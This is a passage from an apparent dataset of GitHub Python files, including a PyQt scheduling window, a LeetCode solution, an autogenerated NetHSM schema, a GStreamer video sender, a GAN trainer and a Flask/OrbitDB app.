PyQt5.QtGui import QIcon\n\nfrom project.BackEnd.Preset import Presets\nfrom project.BackEnd.Routine import Routine\nfrom project.BackEnd.Schedule import import_schedule, generate_image, Event\nfrom project.BackEnd.TimeList import TimeList\nfrom project.gui.general_window_gui import GeneralWindow\nfrom project.gui import palette\n\n\nclass AddRoutineWindow(GeneralWindow):\n\n def __init__(self, window_list, prefs):\n super().__init__(window_list, prefs)\n\n def init_ui(self):\n # Window Styling\n self.setWindowTitle(\"Add Routine\")\n self.setStyleSheet(\"color: 'white';\" +\n \"font-size: 13px;\" +\n \"background-color: #303136;\"\n )\n icon = QIcon(self.prefs.images['icon_add'])\n self.setWindowIcon(icon)\n self.setFixedWidth(300)\n\n # Layout\n form_layout = QFormLayout()\n form_layout.setSpacing(10)\n form_layout.setHorizontalSpacing(50)\n\n # Title\n title = QLabel('Add Routine')\n title.setContentsMargins(0,10,0,10)\n title.setStyleSheet(self.prefs.style_sheets['text_title'])\n\n # category\n title_category = QLabel('Category')\n title_category.setStyleSheet(self.prefs.style_sheets['text_mute_tight'])\n self.category = QComboBox(self)\n self.category.setStyleSheet(\"padding: 5px 10px;\")\n categories = [\"Sleep\", \"Lunch\", \"Dinner\", \"Other\"]\n self.category.addItems(categories)\n\n # start time\n title_start_time = QLabel('Start Time')\n\n start_time_layout = QHBoxLayout()\n start_time_layout.addWidget(QLabel(\"Start time\"))\n start_time_layout.addStretch(1)\n\n self.start_hour = QComboBox(self)\n self.start_hour.addItems([f'{x}' for x in range(24)])\n start_time_layout.addWidget(self.start_hour)\n start_time_layout.addWidget(QLabel('h'))\n self.start_min = QComboBox(self)\n self.start_min.addItems(['0', '15', '30', '45'])\n start_time_layout.addWidget(self.start_min)\n start_time_layout.addWidget(QLabel('m'))\n\n # End time\n title_end_time = QLabel(\"End time\")\n end_time_layout = QHBoxLayout()\n end_time_layout.addWidget(QLabel(\"End time\"))\n end_time_layout.addStretch(1)\n\n self.end_hour = QComboBox(self)\n self.end_hour.addItems([f'{x}' for x in range(24)])\n end_time_layout.addWidget(self.end_hour)\n end_time_layout.addWidget(QLabel('h'))\n self.end_min = QComboBox(self)\n self.end_min.addItems(['0', '15', '30', '45'])\n end_time_layout.addWidget(self.end_min)\n end_time_layout.addWidget(QLabel('m'))\n\n # recurrence\n title_recurrence = QLabel('Recurrence')\n title_recurrence.setStyleSheet(self.prefs.style_sheets['text_mute_tight'])\n self.recurrence = QComboBox(self)\n self.recurrence.setStyleSheet(\"padding: 5px 10px;\")\n recurrences = [\"Every day\", 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday',\\\n \"Weekdays\", \"Weekend\"]\n self.recurrence.addItems(recurrences)\n\n # add button\n self.add_button = QPushButton(\"Add\")\n self.add_button.setStyleSheet(self.prefs.style_sheets['button_priority_rect'])\n self.add_button.clicked.connect(self.add_routine)\n\n # Overlap text\n self.overlap_text = QLabel()\n self.overlap_text.setWordWrap(True)\n\n # add widgets to layout\n form_layout.addRow(title)\n form_layout.addRow(title_category, self.category)\n form_layout.addRow(start_time_layout)\n form_layout.addRow(end_time_layout)\n form_layout.addRow(title_recurrence, self.recurrence)\n form_layout.addRow(self.overlap_text)\n form_layout.addRow(self.add_button)\n self.setLayout(form_layout)\n\n # def update_endtime(self):\n # start = self.start_time.time()\n # dur = self.duration.value()\n # end = start.addSecs(int(dur*5*60))\n # self.end_time.setText(\"End time: \" + end.toString())\n\n def add_routine(self):\n\n # get all values\n # start = self.start_time.time().toString()\n # dur = self.duration.value() # slots\n presets = Presets()\n start = datetime.time(int(self.start_hour.currentText()), int(self.start_min.currentText()))\n end = datetime.time(int(self.end_hour.currentText()), int(self.end_min.currentText()))\n # dummydate = datetime.date(1, 1, 1)\n # start_dum = datetime.datetime.combine(dummydate, start)\n # end = datetime.datetime.combine(dummydate, end)\n # duration = end - start_dum\n # slots = divmod(duration.total_seconds(), 900)[0]\n\n name = self.category.currentText()\n\n\n days = self.recurrence.currentText()\n\n day_dict = {\"Monday\": [0], \"Tuesday\": [1], \"Wednesday\": [2],\n \"Thursday\": [3], \"Friday\": [4], \"Saturday\": [5],\n \"Sunday\": [6], \"Weekdays\": range(5), \"Weekend\": [5, 6],\n \"Every day\": range(7)}\n\n # add event to schedule\n tl = TimeList()\n tl1 = TimeList()\n for start_day in day_dict[days]:\n start_time = int((start.hour*60+start.minute)/presets.time_interval)\n end_time = int((end.hour*60+end.minute)/presets.time_interval)-1\n end_day = start_day\n if end_time < start_time:\n end_day = start_day+1\n tl.add_time(start_day, start_time, end_day, end_time)\n if name == \"Sleep\":\n dur = (datetime.time.fromisoformat(presets.length_morning_routine).minute +\\\n datetime.time.fromisoformat(presets.length_morning_routine).hour*60)/presets.time_interval\n tl1.add_duration(end_day, end_time+1, dur)\n routine = Routine(-1, name, tl)\n vars = routine.create_event()\n event = Event(vars[0], vars[1], vars[2], vars[3])\n schedule = import_schedule()\n # Check overlap\n if schedule.check_overlap(event):\n # display info\n self.notify_overlap()\n else:\n routine.export_routine()\n schedule.add_event(event)\n schedule.export_schedule()\n generate_image()\n if routine.name == \"Sleep\":\n routine1 = Routine(-1, \"Morning Routine\", tl1)\n vars1 = routine1.create_event()\n event1 = Event(vars1[0], vars1[1], vars1[2], vars1[3])\n if schedule.check_overlap(event1):\n # display info\n self.notify_overlap()\n else:\n routine1.export_routine()\n schedule.add_event(event1)\n schedule.export_schedule()\n generate_image()\n GeneralWindow.raise_event(self.ls_w, 'reload_routines')\n self.close()\n else:\n GeneralWindow.raise_event(self.ls_w, 'reload_routines')\n self.close()\n\n\n\n\n def notify_overlap(self):\n text = \"The new routine overlaps with an existing routine.\"\n self.overlap_text.setText(text)\n\n\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n win = AddRoutineWindow([], palette.Prefs())\n\n sys.exit(app.exec())\n","repo_name":"Hashim-K/TI3115TU","sub_path":"project/gui/add_routine_gui.py","file_name":"add_routine_gui.py","file_ext":"py","file_size_in_byte":7536,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"5361647018","text":"\"\"\"\ntag: 栈;树;广度优先搜索\n103. 二叉树的锯齿形层序遍历\nhttps://leetcode.cn/problems/binary-tree-zigzag-level-order-traversal/\n\"\"\"\n\n\n# # Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\n\nfrom collections import deque\n\n\nclass Solution:\n def zigzagLevelOrder(self, root: Optional[TreeNode]) -> List[List[int]]:\n if not root:\n return []\n\n res = []\n queue = deque()\n queue.append(root)\n while queue:\n level_size = len(queue)\n level_res = []\n for i in range(level_size):\n node = queue.popleft()\n level_res.append(node.val)\n if node.left:\n queue.append(node.left)\n if node.right:\n queue.append(node.right)\n res.append(level_res)\n\n zigzag_res = [item[::-1] if i % 2 == 1 else item for i, item in\n enumerate(res)]\n\n return zigzag_res\n","repo_name":"ZhangRui111/AwesomeAlgorithm","sub_path":"leetcode/medium/103.py","file_name":"103.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9967524290","text":"class Solution:\n def getSub(self, a: int, b: int) -> int:\n max_num=max(a,b)\n min_num=min(a,b)\n lst=[]\n for i in range(max_num):\n\n lst.append(1)\n for j in range(min_num):\n lst.remove(1)\n\n print(len(lst))\n\na = 1\nb = 2\n# a = 2\n# b = 3\ns1=Solution()\ns1.getSub(a,b)","repo_name":"SACHINKV14/MCS_00_Sachin_Core_Python","sub_path":"practice 04 Dec/harsha_tasks/_27_jan_2022/substraction_of_two_integers.py","file_name":"substraction_of_two_integers.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43011729075","text":"# coding: utf-8\n\n\"\"\"\n NetHSM\n All endpoints expect exactly the specified JSON. Additional properties will cause a Bad Request Error (400). All HTTP errors contain a JSON structure with an explanation of type string. All [base64](https://tools.ietf.org/html/rfc4648#section-4) encoded values are Big Endian. # noqa: E501\n The version of the OpenAPI document: v1\n Generated by: https://github.com/openapi-json-schema-tools/openapi-json-schema-generator\n\"\"\"\n\nfrom __future__ import annotations\nfrom nethsm.client.shared_imports.schema_imports import * # pyright: ignore [reportWildcardImportFromLibrary]\n\nTime: typing_extensions.TypeAlias = schemas.DateTimeSchema\nProperties = typing.TypedDict(\n 'Properties',\n {\n \"time\": typing.Type[Time],\n }\n)\n\n\nclass TimeConfigDict(schemas.immutabledict[str, schemas.OUTPUT_BASE_TYPES]):\n\n __required_keys__: typing.FrozenSet[str] = frozenset({\n \"time\",\n })\n __optional_keys__: typing.FrozenSet[str] = frozenset({\n })\n \n def __new__(\n cls,\n *,\n time: typing.Union[\n str,\n datetime.datetime\n ],\n configuration_: typing.Optional[schema_configuration.SchemaConfiguration] = None,\n **kwargs: schemas.INPUT_TYPES_ALL,\n ):\n arg_: typing.Dict[str, typing.Any] = {\n \"time\": time,\n }\n arg_.update(kwargs)\n used_arg_ = typing.cast(TimeConfigDictInput, arg_)\n return TimeConfig.validate(used_arg_, configuration=configuration_)\n \n @staticmethod\n def from_dict_(\n arg: typing.Union[\n TimeConfigDictInput,\n TimeConfigDict\n ],\n configuration: typing.Optional[schema_configuration.SchemaConfiguration] = None\n ) -> TimeConfigDict:\n return TimeConfig.validate(arg, configuration=configuration)\n \n @property\n def time(self) -> str:\n return typing.cast(\n str,\n self.__getitem__(\"time\")\n )\n \n def get_additional_property_(self, name: str) -> typing.Union[schemas.OUTPUT_BASE_TYPES, schemas.Unset]:\n schemas.raise_if_key_known(name, self.__required_keys__, self.__optional_keys__)\n return self.get(name, schemas.unset)\nTimeConfigDictInput = typing.Mapping[str, schemas.INPUT_TYPES_ALL]\n\n\n@dataclasses.dataclass(frozen=True)\nclass TimeConfig(\n schemas.Schema[TimeConfigDict, tuple]\n):\n \"\"\"NOTE: This class is auto generated by OpenAPI JSON Schema Generator.\n Ref: https://github.com/openapi-json-schema-tools/openapi-json-schema-generator\n\n Do not edit the class manually.\n \"\"\"\n types: typing.FrozenSet[typing.Type] = frozenset({schemas.immutabledict})\n required: typing.FrozenSet[str] = frozenset({\n \"time\",\n })\n properties: Properties = dataclasses.field(default_factory=lambda: schemas.typed_dict_to_instance(Properties)) # type: ignore\n type_to_output_cls: typing.Mapping[\n typing.Type,\n typing.Type\n ] = dataclasses.field(\n default_factory=lambda: {\n schemas.immutabledict: TimeConfigDict\n }\n )\n\n @classmethod\n def validate(\n cls,\n arg: typing.Union[\n TimeConfigDictInput,\n TimeConfigDict,\n ],\n configuration: typing.Optional[schema_configuration.SchemaConfiguration] = None\n ) -> TimeConfigDict:\n return super().validate_base(\n arg,\n configuration=configuration,\n )\n\n","repo_name":"Nitrokey/nethsm-sdk-py","sub_path":"nethsm/client/components/schema/time_config.py","file_name":"time_config.py","file_ext":"py","file_size_in_byte":3459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23021537462","text":"# 'gst-launch-1.0 v4l2src ! videoscale ! videoconvert ! x264enc tune=zerolatency bitrate=500 speed-preset=superfast ! rtph264pay ! udpsink port=5000'\n# filesrc location=hncloud.mp4 ! decodebin ! omxh265enc ! mpegtsmux ! tcpserversink host=192.168.1.2 port=5000\n# filesrc location=test.mp4 ! decodebin ! video/x-raw,format=NV12 ! omxh265enc ! mpegtsmux ! tcpserversink host=<tx2_server_IP> port=5000 recover-policy=keyframe sync-method=latest-keyframe sync=false\n# gst-launch-1.0 filesrc location=hncloud.mp4 ! decodebin ! x264enc ! mpegtsmux ! queue ! tcpserversink host=192.168.1.2 port=5000 recover-policy=keyframe sync-method=latest-keyframe sync=false\n# gst-launch-1.0 filesrc location=hncloud.mp4 ! decodebin ! omxh265enc ! mpegtsmux ! tcpserversink host=192.168.1.2 port=5000\n\n# hncloud.mp4 fps=30 shape(728, 858)\nimport cv2\nfrom CloudDetect import *\n\n# On Jetson\n# fourcc = cv2.VideoWriter_fourcc('M','J','P','G')\n# out = cv2.VideoWriter('appsrc ! videoconvert ! omxh265enc ! mpegtsmux ! tcpserversink host=192.168.1.2 port=5000 sync=false', fourcc, 30.0, (w, h), True)\n\n# On PC\ncap = cv2.VideoCapture('video/hncloud.mp4')\nw = 1200\nh = 900\n# w = 800\n# h = 600\n\n# Allow to send to client (percent %)\nsendingThreshold = 30\n\nfourcc = cv2.VideoWriter_fourcc('M', 'J', 'P', 'G')\nout = cv2.VideoWriter(\n 'appsrc ! videoconvert ! x264enc ! mpegtsmux ! tcpserversink host=192.168.1.1 port=5000 recover-policy=keyframe sync-method=latest-keyframe sync=false', fourcc, 30.0, (w, h), True)\n\nif (not out.isOpened()):\n print(\"not OKEEE\")\n\ncountFrame = 0\nwhile cap.isOpened():\n ret, frame = cap.read()\n if ret:\n\n frame = cv2.resize(frame, (w, h), interpolation=cv2.INTER_CUBIC)\n\n # Cloud Detection\n if (countFrame < 1):\n threshold = Kmean(frame)\n cloudFrame = CloudThreshold(frame, threshold)\n totalCloud = TotalCloud(frame, threshold)\n\n # percent Cloud\n percetCloud = round(totalCloud/(w*h) * 100, 0)\n if (percetCloud > sendingThreshold):\n print('Frame: ' + str(countFrame) + ' has ' + str(percetCloud) + '%' + ' will not send')\n else:\n print('Frame: ' + str(countFrame) + ' has ' + str(percetCloud) + '%' + ' will send')\n out.write(frame)\n\n # Show\n cv2.imshow('sender', cloudFrame)\n countFrame = countFrame + 1\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n else:\n break\n\n# Release everything if job is finished\ncap.release()\nout.release()\ncv2.destroyAllWindows()\n","repo_name":"guiltylotus/JetsonToPC","sub_path":"Sender_Jetson2.py","file_name":"Sender_Jetson2.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"26297795899","text":"from fanfic import FanFic\nfrom fanfic import Author\n\nclass FanFicEBook(FanFic):\n _FilePath = ''\n _Packaged = ''\n _Tags = []\n _Pairings = []\n _Publisher = ''\n\n def __init__(self):\n self._Url = \"\"\n self._Title = \"\"\n self._Published = \"\"\n self._Updated = \"\"\n self._CharactersString = \"\"\n self._Summary = \"\"\n self._Rating = \"\"\n self._GenreString = \"\"\n self._Words = 0\n self._Characters = []\n self._Relationships = []\n self._Fandoms = []\n self._Chapters = 0\n self._FFNetID = \"\"\n self._FicID = 0\n self._Status = ''\n self._Genres = []\n self._Author = Author()\n self._FilePath = ''\n self._Packaged = ''\n self._Tags = []\n self._Pairings = []\n self._Publisher = ''\n\n def reset(self):\n self._Url = \"\"\n self._Title = \"\"\n self._Published = \"\"\n self._Updated = \"\"\n self._CharactersString = \"\"\n self._Summary = \"\"\n self._Rating = \"\"\n self._GenreString = \"\"\n self._Words = 0\n self._Characters = []\n self._Relationships = []\n self._Fandoms = []\n self._Chapters = 0\n self._FFNetID = \"\"\n self._FicID = 0\n self._Genres = []\n self._Author.reset()\n self._Status = ''\n self._FilePath = ''\n self._Packaged = ''\n self._Tags = []\n self._Pairings = []\n self._Publisher = ''\n\n\n @property\n def FilePath(self):\n return self._FilePath\n\n @FilePath.setter\n def FilePath(self, vsFilePath):\n self._FilePath = vsFilePath\n\n @property\n def Packaged(self):\n return self._Packaged\n\n @Packaged.setter\n def Packaged(self, vsPackaged):\n self._Packaged = vsPackaged\n\n @property\n def Tags(self):\n return self._Tags\n\n @Tags.setter\n def Tags(self, vTags):\n self._Tags = vTags\n\n @property\n def Pairings(self):\n return self._Pairings\n\n @Pairings.setter\n def Pairings(self, vs_Pairings):\n self._Pairings = vs_Pairings\n\n @property\n def Publisher(self):\n return self._Publisher\n\n @Publisher.setter\n def Publisher(self, vsPublisher):\n self._Publisher = vsPublisher\n\n\n\n","repo_name":"aragorn55/EpubDB","sub_path":"fic_file.py","file_name":"fic_file.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17313973309","text":"import smtplib\nfrom email.mime.text import MIMEText\n#from email.mime.multipart import MIMEMultipart\nfrom log import logit\n\nfrom_ = ''\npswd = ''\nhost = ''\nport = 465\n\ndef sendmail(to_,sub_,main_=\"molebot.com\"):\n server = smtplib.SMTP_SSL()\n logit(str(server.connect(host,port)))\n logit((server.login(from_,pswd)))\n msg = MIMEText(main_)\n msg['From'] = from_\n msg['To'] = to_\n msg['Subject'] = sub_\n logit(str(server.sendmail(from_,to_,msg.as_string())))\n logit('qqmail ok')\n server.quit()\n \ndef alertmail(sub_,main_=\"from molebot.com\"):\n sendmail('botbot@189.cn',sub_,main_)\n\n#alertmail('begin','ok')","repo_name":"rlcjj/web_ctp-1","sub_path":"zmq_server/qqmail.py","file_name":"qqmail.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"17086870215","text":"class Solution:\n def maxPoints(self, points: List[List[int]]) -> int:\n n = len(points)\n if n<=2:\n return n\n \n def getSlope(p1, p2):\n x1, y1 = p1\n x2, y2 = p2\n if x1==x2:\n return 1000000007\n return (y2-y1)/(x2-x1)\n \n ans = 1\n for i in range(n):\n d = defaultdict(int)\n for j in range(i+1, n):\n slope = getSlope(points[i], points[j])\n d[slope] += 1\n ans = max(d[slope], ans)\n return ans+1\n ","repo_name":"mrprashantkumar/LeetCode-Submissions-Python","sub_path":"0149-max-points-on-a-line/0149-max-points-on-a-line.py","file_name":"0149-max-points-on-a-line.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"44142570107","text":"import requests\nimport json\n\n\nuser_agents = ['Mozilla/5.0 (Linux; U; Android 4.0.2; en-us; Galaxy Nexus Build/ICL53F) AppleWebKit/534.30 (KHTML, '\n 'like Gecko) Version/4.0 Mobile Safari/534.30', 'Mozilla/5.0 (iPad; CPU OS 13_2 like Mac OS X) '\n 'AppleWebKit/605.1.15 (KHTML, like Gecko) '\n 'CriOS/91.0.4472.77 Mobile/15E148 Safari/604.1',\n 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.100.0',\n 'Mozilla/5.0 (iPad; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) '\n 'Version/13.0.3 Mobile/15E148 Safari/604.1']\n\nplatforms = ['Mobile', 'Mobile', 'Googlebot', 'Web', 'Mobile']\nbrowsers = ['No', 'Chrome', 'Unknown', 'Chrome', 'No']\ndevices = ['Android', 'iOS', 'Unknown', 'No', 'iPhone']\n\ni = 0\n\nwhile i <= 4:\n response = requests.get(\n \"https://playground.learnqa.ru/ajax/api/user_agent_check\",\n headers={\"User-Agent\": user_agents[i]}\n )\n\n json_text = response.text\n response_dict = json.loads(json_text)\n v_platform = response_dict['platform']\n v_browser = response_dict['browser']\n v_device = response_dict['device']\n\n if platforms[i] != v_platform:\n print(\"Значение платформы не соответствует, требовалось:\", platforms[i], \"а получено в ответ\", v_platform,\n \"неверный UserAgent:\", user_agents[i])\n\n if browsers[i] != v_browser:\n print(\"Значение браузера не соответствует, требовалось:\", browsers[i], \"а получено в ответ\", v_browser,\n \"неверный UserAgent:\", user_agents[i])\n\n if devices[i] != v_device:\n print(\"Значение девайса не соответствует, требовалось:\", devices[i], \"а получено в ответ\", v_device,\n \"неверный UserAgent:\", user_agents[i])\n\n i += 1\n\n\n\n","repo_name":"QuakeXpresS/LearnQA_PythonAPI","sub_path":"Ex13.py","file_name":"Ex13.py","file_ext":"py","file_size_in_byte":2258,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"4775834888","text":"\nfrom fastgan.fastganmodels import FastGANBaseModel\nfrom fastgan.fastgannets import SimpleGenerator, SimpleDescriminator \nfrom fastgan.fastgantrainer import FastGANTrainer\n\nfrom torchvision import datasets, transforms\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision.utils as vutils\nfrom torch.autograd import Variable\n\n\nclass MnistSimpleGAN(FastGANBaseModel):\n \n def __init__(self, db, pid, expid):\n super().__init__(db, pid, expid)\n\n self.gt = MNIST_trainer(self)\n \n\n \n\n def prepare_data(self):\n hyperparams = self.recorder.get_hyper_params()\n dataroot = self.recorder.get_exp_info(\"expDataPath\")\n\n transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean=(0.5,), std=(0.5,))])\n\n self.dataset = datasets.MNIST(root=dataroot, train=True, transform=transform, download=True)\n\n self.dataloader = torch.utils.data.DataLoader(dataset=self.dataset, \n batch_size=int(hyperparams[\"batch_size\"]), \n shuffle=True)\n\n self.recorder.record_dataloader_size(len(self.dataloader))\n\n def set_device(self):\n hyperparams = self.recorder.get_hyper_params()\n self.device = torch.device(\"cuda:0\" if (torch.cuda.is_available() and \n int(hyperparams[\"ngpu\"]) > 0) else \"cpu\")\n\n\n \n def generate_input_image_grid(self, path):\n\n self.prepare_data()\n self.set_device()\n\n real_data_batch = next(iter(self.dataloader))\n # real_data_batch = real_data_batch.view(real_data_batch.size(0), 1, 28, 28)\n vutils.save_image(real_data_batch[0].to(self.device)[:64], path, nrow=8, padding=2)\n\n def init_nets(self):\n hyperparams = self.recorder.get_hyper_params()\n\n self.netG = SimpleGenerator(int(hyperparams[\"ngpu\"]),\n int(hyperparams[\"nz\"]))\n\n self.netD = SimpleDescriminator(int(hyperparams[\"ngpu\"]))\n\n self.netG.to(self.device)\n self.netD.to(self.device)\n\n def init_criterion(self):\n self.criterion = nn.BCELoss()\n\n def init_optimizers(self):\n hyperparams = self.recorder.get_hyper_params()\n self.optimizerD = optim.Adam(self.netD.parameters(), lr=float(hyperparams[\"lr\"]), \n betas=(float(hyperparams[\"beta1\"]), 0.999)\n )\n self.optimizerG = optim.Adam(self.netG.parameters(), lr=float(hyperparams[\"lr\"]), \n betas=(float(hyperparams[\"beta1\"]), 0.999)\n )\n\n \n\n\n \n\nclass MNIST_trainer(FastGANTrainer):\n def __init__(self, gan):\n super().__init__(gan)\n\n def train(self, num_epochs):\n # self.total_epochs = int(self.gan.recorder.get_exp_info(\"total_epochs\")) + 1\n\n hyperparams = self.gan.recorder.get_hyper_params()\n\n print(\"Train method is working ...================\")\n\n for epoch in range(num_epochs):\n\n for i, (images, _) in enumerate(self.gan.dataloader):\n\n bs = images.shape[0]\n #print(bs)\n images = images.view(bs, -1).cuda()\n images = Variable(images)\n # print(\"image size =\", images.shape)\n # Create the labels which are later used as input for the BCE loss\n real_labels = torch.ones(bs, 1).cuda()\n real_labels = Variable(real_labels)\n fake_labels = torch.zeros(bs, 1).cuda()\n fake_labels = Variable(fake_labels)\n\n # ================================================================== #\n # Train the discriminator #\n # ================================================================== #\n self.gan.netD.zero_grad()\n # Compute BCE_Loss using real images where BCE_Loss(x, y): - y * log(D(x)) - (1-y) * log(1 - D(x))\n # Second term of the loss is always zero since real_labels == 1\n outputs = self.gan.netD(images)\n d_loss_real = self.gan.criterion(outputs, real_labels)\n real_score = outputs\n \n # Compute BCELoss using fake images\n # First term of the loss is always zero since fake_labels == 0\n z = torch.randn(bs, int(hyperparams[\"nz\"])).cuda()\n z = Variable(z)\n fake_images = self.gan.netG(z)\n outputs = self.gan.netD(fake_images)\n d_loss_fake = self.gan.criterion(outputs, fake_labels)\n fake_score = outputs\n \n # Backprop and optimize\n # If D is trained so well, then don't update\n d_loss = d_loss_real + d_loss_fake\n \n d_loss.backward()\n self.gan.optimizerD.step()\n # ================================================================== #\n # Train the generator #\n # ================================================================== #\n self.gan.netG.zero_grad()\n # Compute loss with fake images\n z = torch.randn(bs, int(hyperparams[\"nz\"])).cuda()\n z = Variable(z)\n fake_images = self.gan.netG(z)\n outputs = self.gan.netD(fake_images)\n \n # We train G to maximize log(D(G(z)) instead of minimizing log(1-D(G(z)))\n # For the reason, see the last paragraph of section 3. https://arxiv.org/pdf/1406.2661.pdf\n g_loss = self.gan.criterion(outputs, real_labels)\n \n # Backprop and optimize\n # if G is trained so well, then don't update\n #reset_grad()\n g_loss.backward()\n self.gan.optimizerG.step()\n \n\n #print(\"Finisjhed============\")\n self.gan.recorder.record_iters(i +1)\n print(i)\n\n \n \n print(\"Finished iters\")\n # self.gan.recorder.record_exp_info(\"total_epochs\", int(self.total_epochs))\n self.gan.recorder.add_total_epoch()\n print(\"add total epoch\")\n self.gan.recorder.record_iters(0) # reset iters\n\n current_total_epoch = self.gan.recorder.read_total_epoch()\n\n\n # after read total epoch, collect plot data\n # recording stats to plot\n self.gan.recorder.record_train_stat(current_total_epoch, \"d_loss\", d_loss.item())\n self.gan.recorder.record_train_stat(current_total_epoch, \"g_loss\", g_loss.item())\n \n\n\n self.save_checkpoint(current_total_epoch, \"EPOCH\") # save model for each epoch\n self.save_generator_progress(current_total_epoch, 64)\n\n self.gan.recorder.record_exp_info(\"current_epoch\", epoch +1) #update current epoch\n self.gan.recorder.record_exp_info(\"current_epoch\", 0) # reset current epoch to 0\n\n\n def save_inference_output(self, iter, num_of_samples):\n \"\"\"\n To save the output of trained checkpoints\n \"\"\"\n hyperparams = self.gan.recorder.get_hyper_params()\n \n z = torch.randn(num_of_samples, int(hyperparams[\"nz\"])).cuda()\n z = Variable(z)\n\n imgpath = self.gan.recorder.add_image(\"INFERENCED\", iter=iter) \n self.gan.netG.eval()\n fake = self.gan.netG(z).detach().cpu()\n vutils.save_image(fake.view(num_of_samples, 1, 28, 28), imgpath, nrow=8, padding=2)\n print(\"Inferenced Image saved\")\n\n def save_generator_progress(self, iter, num_of_samples):\n imgpath = self.gan.recorder.add_image(\"GENDATA\", iter=iter)\n hyperparams = self.gan.recorder.get_hyper_params()\n \n z = torch.randn(num_of_samples, int(hyperparams[\"nz\"])).cuda()\n z = Variable(z)\n with torch.no_grad():\n fake = self.gan.netG(z).detach().cpu()\n vutils.save_image(fake.view(num_of_samples, 1, 28, 28), imgpath, nrow=8, padding=2)\n \n\n\n\n\n\n\n\n","repo_name":"vlbthambawita/GANExFlask","sub_path":"GANEX/FastGAN_examples/mnistgan_example.py","file_name":"mnistgan_example.py","file_ext":"py","file_size_in_byte":8312,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20642840302","text":"# Ocean Protocol (Outlier Ventures' abstraction)\nimport register as reg\n\n# OrbitDB\nfrom Naked.toolshed.shell import execute_js\n\n# Azure Storage\nimport uuid, sys\nfrom azure.storage.blob import BlockBlobService, PublicAccess\n\n# Flask\nfrom flask import Flask, request, jsonify\n\n# Utilities\nimport os, shutil, json, requests, logging, random, string\n\n# Clustering\nfrom sklearn.cluster import KMeans\nimport pandas as pd\nimport matplotlib\n# Run matplotlib in headless mode, prevents NSWindow crash\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\n\n\n# declare constants\nHOST = '0.0.0.0'\nPORT = 8081\n\n# initialize flask application\napp = Flask(__name__)\nlog = logging.getLogger('werkzeug')\nlog.setLevel(logging.ERROR)\n\n\n@app.route('/api/orbit', methods=['POST'])\ndef get_orbit():\n\n # OrbitDB writeflag issue workaround: delete local copy on query\n if os.path.exists('orbitdb'):\n shutil.rmtree('orbitdb')\n\n if os.path.exists('data.json'):\n os.remove('data.json')\n\n # Get parameters for OrbitDB\n parameters = request.get_json()\n\n # Write OrbitDB address to file\n output = {\n \"address\": parameters['address']\n }\n with open('config.json', 'w') as outfile:\n json.dump(output, outfile)\n\n execute_js('orbit.js')\n\n # Read in dataframe\n try:\n data = pd.read_json('data.json')\n df = data.values[:, [0, 1]]\n \n # Plot original\n plt.figure(1)\n plt.scatter(df[:, 0], df[:, 1])\n plt.savefig('../frontend/src/assets/images/before.png')\n plt.close()\n\n except:\n print('No OrbitDB database found.')\n\n return ('', 200)\n\n\n@app.route('/api/train', methods=['POST'])\ndef train():\n\n # OrbitDB writeflag issue workaround: delete local copy on query\n if os.path.exists('orbitdb'):\n shutil.rmtree('orbitdb')\n\n if os.path.exists('output.json'):\n os.remove('output.json')\n\n # Get parameters for clustering\n parameters = request.get_json()\n\n # Read in dataframe\n try:\n data = pd.read_json('data.json')\n df = data.values[:, [0, 1]]\n except:\n print('No OrbitDB database found.')\n\n # K-means cluster\n kmeans = KMeans(n_clusters = int(parameters['clusters']))\n kmeans.fit(df)\n prediction = kmeans.predict(df)\n centers = kmeans.cluster_centers_\n\n # Write clustered output to file\n output = {\n \"data\": df.tolist(),\n \"cluster\": prediction.tolist(),\n \"centroids\": centers.tolist()\n }\n with open('output.json', 'w') as outfile:\n json.dump(output, outfile)\n\n # Plot result\n plt.figure(2)\n plt.scatter(df[:, 0], df[:, 1], c = prediction)\n plt.scatter(centers[:, 0], centers[:, 1], s = 200, alpha = 0.5)\n plt.savefig('../frontend/src/assets/images/after.png')\n plt.close()\n\n '''\n Testing only, if you have ground truth:\n K-means is not classification, so accuracy doesn't really apply.\n Nevertheless, labels can be loaded for an 'accuracy' metric:\n truth = data['t'].values\n Compare to the 'prediction' array. Note you may have to use the\n random_state parameter so that cluster ordering is deterministic.\n '''\n\n return ('', 200)\n\n\n@app.route('/api/ocean', methods=['POST'])\ndef publish_asset():\n\n # Get parameters for clustering\n parameters = request.get_json()\n\n '''\n # Uncomment this for OrbitDB hosting (PoC, not Ocean testnet compatible yet)\n 